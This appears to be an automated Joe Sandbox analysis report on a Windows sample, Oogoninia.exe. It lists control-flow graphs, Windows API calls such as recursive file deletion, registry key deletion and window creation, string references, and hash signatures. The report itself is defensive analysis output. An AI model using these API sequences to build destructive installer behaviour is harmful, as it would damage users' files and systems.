                                                                                                                                                                                    control_flow_graph 469 405dc2-405dcd 470 405de0-405df5 469->470 471 405dcf-405dde 469->471 472 405fe8-405fec 470->472 473 405dfb-405e06 470->473 471->470 474 405ff2-405ffc 472->474 475 405e18-405e22 472->475 473->472 476 405e0c-405e13 473->476 477 406007-406008 474->477 478 405ffe-406002 call 405da0 474->478 475->474 479 405e28-405e2f 475->479 476->472 478->477 481 405e35-405e6a 479->481 482 405fdb 479->482 483 405e70-405e7b GetVersion 481->483 484 405f85-405f88 481->484 485 405fe5-405fe7 482->485 486 405fdd-405fe3 482->486 487 405e95 483->487 488 405e7d-405e81 483->488 489 405fb8-405fbb 484->489 490 405f8a-405f8d 484->490 485->472 486->472 494 405e9c-405ea3 487->494 488->487 491 405e83-405e87 488->491 495 405fc9-405fd9 lstrlenA 489->495 496 405fbd-405fc4 call 405dc2 489->496 492 405f9d-405fa9 call 405da0 490->492 493 405f8f-405f9b call 405cfe 490->493 491->487 497 405e89-405e8d 491->497 507 405fae-405fb4 492->507 493->507 499 405ea5-405ea7 494->499 500 405ea8-405eaa 494->500 495->472 496->495 497->487 503 405e8f-405e93 497->503 499->500 505 405ee3-405ee6 500->505 506 405eac-405ec7 call 405c87 500->506 503->494 508 405ef6-405ef9 505->508 509 405ee8-405ef4 GetSystemDirectoryA 505->509 515 405ecc-405ecf 506->515 507->495 511 405fb6 507->511 513 405f63-405f65 508->513 514 405efb-405f09 GetWindowsDirectoryA 508->514 512 405f67-405f6a 509->512 516 405f7d-405f83 call 40600b 511->516 512->516 520 405f6c-405f70 512->520 513->512 518 405f0b-405f15 513->518 514->513 519 405ed5-405ede call 405dc2 515->519 515->520 516->495 522 405f17-405f1a 518->522 523 405f2f-405f45 SHGetSpecialFolderLocation 518->523 519->512 520->516 525 405f72-405f78 lstrcatA 520->525 522->523 526 405f1c-405f23 522->526 527 405f60 523->527 528 405f47-405f5e SHGetPathFromIDListA CoTaskMemFree 523->528 525->516 530 405f2b-405f2d 526->530 527->513 528->512 528->527 530->512 530->523
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersion.KERNEL32(00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405E73
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F01
                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405F3D
                                                                                                                                                                                    • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405F4B
                                                                                                                                                                                    • CoTaskMemFree.OLE32(0078FCF8), ref: 00405F56
                                                                                                                                                                                    • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F78
                                                                                                                                                                                    • lstrlenA.KERNEL32(Call,00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405FCA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                    • API String ID: 900638850-1230650788
                                                                                                                                                                                    • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                                                                                                                                    • Instruction ID: 6cdfcc9d134e5fa542626d346f44b404821d9f3efcf53b1aa70e88c92b4f8a03
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4610271A04A06AEEB115B24CC84BBF3BA8EB56314F54813BE541BA2D0D37D4981DF4E
                                                                                                                                                                                    Function 00405642 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 531 405642-405668 call 405900 534 405681-405688 531->534 535 40566a-40567c DeleteFileA 531->535 537 40568a-40568c 534->537 538 40569b-4056ab call 405da0 534->538 536 40580b-40580f 535->536 539 405692-405695 537->539 540 4057b9-4057be 537->540 544 4056ba-4056bb call 405859 538->544 545 4056ad-4056b8 lstrcatA 538->545 539->538 539->540 540->536 543 4057c0-4057c3 540->543 546 4057c5-4057cb 543->546 547 4057cd-4057d5 call 4060a4 543->547 549 4056c0-4056c3 544->549 545->549 546->536 547->536 554 4057d7-4057eb call 405812 call 4055fa 547->554 552 4056c5-4056cc 549->552 553 4056ce-4056d4 lstrcatA 549->553 552->553 555 4056d9-4056f7 lstrlenA FindFirstFileA 552->555 553->555 570 405803-405806 call 404fb9 554->570 571 4057ed-4057f0 554->571 557 4056fd-405714 call 40583d 555->557 558 4057af-4057b3 555->558 564 405716-40571a 557->564 565 40571f-405722 557->565 558->540 560 4057b5 558->560 560->540 564->565 567 40571c 564->567 568 405724-405729 565->568 569 405735-405743 call 405da0 565->569 567->565 572 40572b-40572d 568->572 573 40578e-4057a0 FindNextFileA 568->573 581 405745-40574d 569->581 582 40575a-405765 call 4055fa 569->582 570->536 571->546 575 4057f2-405801 call 404fb9 call 405c5b 571->575 572->569 577 40572f-405733 572->577 573->557 579 4057a6-4057a9 FindClose 573->579 575->536 577->569 577->573 579->558 581->573 584 40574f-405758 call 405642 581->584 590 405786-405789 call 404fb9 582->590 591 405767-40576a 582->591 584->573 590->573 593 40576c-40577c call 404fb9 call 405c5b 591->593 594 40577e-405784 591->594 593->573 594->573
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DeleteFileA.KERNELBASE(?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040566B
                                                                                                                                                                                    • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056B3
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D4
                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056DA
                                                                                                                                                                                    • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?,766B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056EB
                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405798
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004057A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564F
                                                                                                                                                                                    • "C:\Users\user\Desktop\Oogoninia.exe", xrefs: 00405642
                                                                                                                                                                                    • \*.*, xrefs: 004056AD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                    • API String ID: 2035342205-449498547
                                                                                                                                                                                    • Opcode ID: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                                                                                                                                                    • Instruction ID: 760187f4f4892300bbc2109203202489edd73d97d78a60d5512a31c146a0733f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51D631804A08EADB216B618C45BBF7B78DF42714F14813BF955721D1D77C8982EE6E
                                                                                                                                                                                    Function 00402B0E Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 784 402b0e-402b37 RegOpenKeyExA 785 402ba2-402ba6 784->785 786 402b39-402b44 784->786 787 402b5f-402b6f RegEnumKeyA 786->787 788 402b71-402b83 RegCloseKey call 406139 787->788 789 402b46-402b49 787->789 797 402b85-402b94 788->797 798 402ba9-402baf 788->798 790 402b96-402b99 RegCloseKey 789->790 791 402b4b-402b5d call 402b0e 789->791 793 402b9f-402ba1 790->793 791->787 791->788 793->785 797->785 798->793 799 402bb1-402bbf RegDeleteKeyA 798->799 799->793 800 402bc1 799->800 800->785
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402B2F
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                                                                    • Opcode ID: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                                                                                                                                                    • Instruction ID: e8770432982ab8decd1ca443e4f50ff6a20a1eaa2a88b85c41c9a6e6fa4e92e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 835a18ee0712391a14b10fd83abfdacb871c0e1db67dd3faae47ba34dcff1796
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49117F36900109FFEF119F90DE89DAE3B7DEB55384F004076FA05B10A0D3B8AE51AB69
                                                                                                                                                                                    Function 004060A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(766B3410,0079FD90,C:\,00405943,C:\,C:\,00000000,C:\,C:\,766B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,766B3410,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 004060BB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                    • API String ID: 2295610775-3404278061
                                                                                                                                                                                    • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                                                                                                                                    • Instruction ID: 4d264840bddbdcf8954fb0232b098af143b8be61859f100819b52cc90bd9207d
                                                                                                                                                                                    • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD0127595A1205BC71197787C0C84B7A589B053307114A32F46AF22E0D6349C7686E9
                                                                                                                                                                                    Function 00403720 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 128 403720-403738 call 406139 131 40373a-40374a call 405cfe 128->131 132 40374c-40377d call 405c87 128->132 140 4037a0-4037c9 call 4039e5 call 405900 131->140 136 403795-40379b lstrcatA 132->136 137 40377f-403790 call 405c87 132->137 136->140 137->136 146 403850-403858 call 405900 140->146 147 4037cf-4037d4 140->147 153 403866-40388b LoadImageA 146->153 154 40385a-403861 call 405dc2 146->154 147->146 148 4037d6-4037fa call 405c87 147->148 148->146 158 4037fc-4037fe 148->158 156 40390c-403914 call 40140b 153->156 157 40388d-4038bd RegisterClassA 153->157 154->153 171 403916-403919 156->171 172 40391e-403929 call 4039e5 156->172 159 4038c3-403907 SystemParametersInfoA CreateWindowExA 157->159 160 4039db 157->160 162 403800-40380d call 40583d 158->162 163 40380f-40381b lstrlenA 158->163 159->156 165 4039dd-4039e4 160->165 162->163 166 403843-40384b call 405812 call 405da0 163->166 167 40381d-40382b lstrcmpiA 163->167 166->146 167->166 170 40382d-403837 GetFileAttributesA 167->170 174 403839-40383b 170->174 175 40383d-40383e call 405859 170->175 171->165 181 4039b2-4039ba call 40508b 172->181 182 40392f-403949 ShowWindow call 4060cb 172->182 174->166 174->175 175->166 187 4039d4-4039d6 call 40140b 181->187 188 4039bc-4039c2 181->188 189 403955-403967 GetClassInfoA 182->189 190 40394b-403950 call 4060cb 182->190 187->160 188->171 193 4039c8-4039cf call 40140b 188->193 191 403969-403979 GetClassInfoA RegisterClassA 189->191 192 40397f-4039b0 DialogBoxParamA call 40140b call 403670 189->192 190->189 191->192 192->165 193->171
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                                                                                                                                      • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                                                                                                                                    • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,766B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Oogoninia.exe",00000000), ref: 0040379B
                                                                                                                                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\slavelivets,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,766B3410), ref: 00403810
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 00403823
                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 0040382E
                                                                                                                                                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\slavelivets), ref: 00403877
                                                                                                                                                                                      • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                                                                                                                                    • RegisterClassA.USER32(007A16E0), ref: 004038B4
                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038CC
                                                                                                                                                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403901
                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403937
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 00403963
                                                                                                                                                                                    • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 00403970
                                                                                                                                                                                    • RegisterClassA.USER32(007A16E0), ref: 00403979
                                                                                                                                                                                    • DialogBoxParamA.USER32(?,00000000,00403AB2,00000000), ref: 00403998
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\Oogoninia.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\slavelivets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                    • API String ID: 1975747703-1882387007
                                                                                                                                                                                    • Opcode ID: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                                                                                                                                    • Instruction ID: 69823c21e20ed545a36681f3e22a73ce5ba8c54c43716b07ce110ef4df70eff0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1361D6B5544240AEE310BF619C45F3B3AACEB85789F40857FF941B22E2D77D9D018A2D
                                                                                                                                                                                    Function 00402CFA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 202 402cfa-402d48 GetTickCount GetModuleFileNameA call 405a13 205 402d54-402d82 call 405da0 call 405859 call 405da0 GetFileSize 202->205 206 402d4a-402d4f 202->206 214 402d88 205->214 215 402e6f-402e7d call 402c96 205->215 207 402f2c-402f30 206->207 217 402d8d-402da4 214->217 221 402ed2-402ed7 215->221 222 402e7f-402e82 215->222 219 402da6 217->219 220 402da8-402db1 call 403122 217->220 219->220 227 402db7-402dbe 220->227 228 402ed9-402ee1 call 402c96 220->228 221->207 225 402e84-402e9c call 403138 call 403122 222->225 226 402ea6-402ed0 GlobalAlloc call 403138 call 402f33 222->226 225->221 249 402e9e-402ea4 225->249 226->221 253 402ee3-402ef4 226->253 231 402dc0-402dd4 call 4059ce 227->231 232 402e3a-402e3e 227->232 228->221 240 402e48-402e4e 231->240 251 402dd6-402ddd 231->251 239 402e40-402e47 call 402c96 232->239 232->240 239->240 244 402e50-402e5a call 4061ae 240->244 245 402e5d-402e67 240->245 244->245 245->217 252 402e6d 245->252 249->221 249->226 251->240 255 402ddf-402de6 251->255 252->215 256 402ef6 253->256 257 402efc-402f01 253->257 255->240 258 402de8-402def 255->258 256->257 259 402f02-402f08 257->259 258->240 260 402df1-402df8 258->260 259->259 261 402f0a-402f25 SetFilePointer call 4059ce 259->261 260->240 263 402dfa-402e1a 260->263 264 402f2a 261->264 263->221 265 402e20-402e24 263->265 264->207 266 402e26-402e2a 265->266 267 402e2c-402e34 265->267 266->252 266->267 267->240 268 402e36-402e38 267->268 268->240
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402D0B
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Oogoninia.exe,00000400), ref: 00402D27
                                                                                                                                                                                      • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00405A17
